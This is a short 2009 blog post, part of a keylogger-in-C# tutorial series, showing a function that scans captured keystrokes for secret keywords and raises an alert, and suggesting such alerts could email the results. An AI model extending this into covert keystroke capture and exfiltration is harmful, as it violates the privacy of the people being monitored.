Keylogger in C# :: catching secret word
by Arxleol on Saturday 31.10.2009, under C#, hack, tutorial, windows
Now this one is more or less simple. And most of the things are already explained. However I would like to point out that you can use alerts fired in the following functions to send emails or something similar.
You may notice that function for sending emails is commented out this is because I hadn’t used this function out of faculty as for example google’s smtp requires authentication.
public void checkKeys() { int max = keyWords.Count; for (int i = 0; i < max; i++) { if (writeUp.Contains((String)keyWords[i])) { MessageBox.Show("KeyWord!"); MessageBox.Show((String)keyWords[i]); writeUp = ""; } } }
Similar Posts:
1 comment for this entry:
Saturday 31.10.2009 on 08:44
[...] Catching secret words [...]